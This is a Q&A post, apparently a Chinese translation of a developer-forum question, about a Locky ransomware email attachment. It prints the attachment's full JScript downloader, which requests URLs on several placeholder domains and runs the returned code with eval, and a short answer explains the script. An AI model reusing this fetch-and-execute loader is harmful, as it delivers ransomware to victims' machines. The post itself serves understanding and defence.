究竟是什么以下.wsf电子邮件攻击试图做什么?

时间:2016-12-06 05:15:43

标签: malware wsh

我收到其中一个“联邦快递包裹无法送达,请打开附近的.doc” - 电子邮件。因为我最近在线订购了东西,因为我显然是个白痴,所以我点击了附件。幸运的是我使用的是Linux,因此打开“filename.doc.wsf”没有任何损害。我做了,但是对它包含的以下片段究竟是什么感到好奇。

根据我的谷歌搜索,最终目标是在Windows系统上安装一个名为Locky的恶意软件。恶意软件试图从中下载的不同域列在数组x []中,而for循环中的前几行似乎是从片段构建整个URL。 (我认为它已经被分解以试图避免垃圾邮件检测。)但是从“尝试”开始我不能完全跟踪发生的事情?

<job><script language=JScript>
var x = new Array("DOMAIN1.com","DOMAIN2.ru","ftp.DOMAIN3.com","DOMAIN4.ru","DOMAIN5.com"); 
var y = "Msxml2.XMLHTTP"; 
for (var i=0; i<5; i++) 
    { 
        x[i] = "http://" + x[i]; 
        x[i] += "/co"; 
        x[i] += "unter/"; 
        x[i] += "?a=0.34960858&i=rRMDdRYvgD1oBqvgMjMaHDglAgtoQ1d6_hYJEPEXmzddhBr8QbsIrfboGHt9FZlWF53OH-6Q8M45bw"; 
        try { 
                var z = new ActiveXObject(y); 
                z.open("GET", x[i], false);
                z.send(); 
                if (z.status == 200) 
                { 
                    eval(z.responseText.split("~").join("a")); 
                    break; 
                }; 
             } 
        catch(e) { }; 
    };
</script></job>

1 个答案:

答案 0 :(得分:0)

它只是向5个不同的URL发送HTTP get请求,并评估从URL中检索的内容。

这是从PC上的远程位置执行代码的简单方法。您可以在不更改此脚本的情况下更改远程代码,从而使您的逻辑更加灵活。